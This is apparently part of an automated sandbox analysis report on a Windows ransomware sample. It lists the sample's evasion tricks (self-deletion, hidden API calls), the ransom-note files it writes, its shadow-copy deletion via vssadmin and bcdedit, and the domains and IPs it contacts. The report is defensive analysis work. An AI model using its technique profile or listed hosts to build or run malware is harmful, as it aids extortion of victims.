Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeKey opened: HKEY_USERS\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\InprocHandler
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\InprocHandler

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeProcess information set: NOOPENFILEERRORBOX
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeCode function: 0_2_0041C8F0 GetVersionExW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,0_2_0041C8F0
Deletes itself after installation
Source: C:\Windows\System32\cmd.exeFile deleted: c:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Overwrites Mozilla Firefox settings
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeFile written: C:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\help_recover_instructions+uuk.txt
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeFile written: C:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\help_recover_instructions+uuk.html

Language, Device and Operating System Detection:

barindex
Contains functionality to query local / system time
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeCode function: 0_2_00425DE6 GetSystemTimeAsFileTime,0_2_00425DE6
Contains functionality to query windows version
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeCode function: 0_2_0041F040 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,SHGetFolderPathW,SHGetFolderPathW,CoCreateInstance,ExitProcess,CoCreateInstance,ExitProcess,LoadLibraryW,LoadStringW,LoadStringW,LoadStringW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetSpecialFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,GetModuleFileNameW,DeleteFileW,LookupPrivilegeValueA,GetLastError,GetVersionExW,CreateThread,SetThreadPriority,0_2_0041F040
Queries the cryptographic machine GUID
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeQueries volume information: C:\ VolumeInformation

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
behavior_graph main Behavior Graph ID: 125244 Sample:  94-61f847bcb69d0fe86ad7a4ba3f057be5.exe Startdate:  12/05/2016 Architecture:  WINDOWS Score:  76 0 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe main->0 started 11 svchost.exe main->11 started 7610sig Accesses Audio hardware information via COM 7611reducedSig Signatures exceeded maximum capacity for this level. 4 signatures have been hidden. 7611sig Accesses Audio hardware information via COM 5321sig Deletes shadow drive data (may be related to ransomware) 2202sig Deletes itself after installation d1e296834reduced Connected ips exeeded maximum capacity for this level. 2 connected ips have been hidden. d1e296834 ip.tyk.nu 144.76.253.225 HetznerOnlineAG Germany d1e296835 partaci.info 176.106.190.60 RadioLANspolsro Slovakia (SLOVAK Republic) d1e296837 topdrivers.org 185.24.99.98 32bitTransitionAS United Kingdom d1e3189 amhfnhe45.exe, PE32 0->7610sig 0->d1e3189 dropped 1 amhfnhe45.exe 0->1 started 2 cmd.exe 0->2 started 1->7611reducedSig 1->7611sig 1->5321sig 1->d1e296834reduced 1->d1e296834 1->d1e296835 1->d1e296837 4reduced Processes exeeded maximum capacity for this level. 4 processes have been hidden. 1->4reduced started 4 reg.exe 1->4 started 6 bcdedit.exe 1->6 started 8 vssadmin.exe 1->8 started 2->2202sig process0 fileCreated0 signatures0 process1 dnsIp1 signatures1 process4 fileCreated1
No Yara matches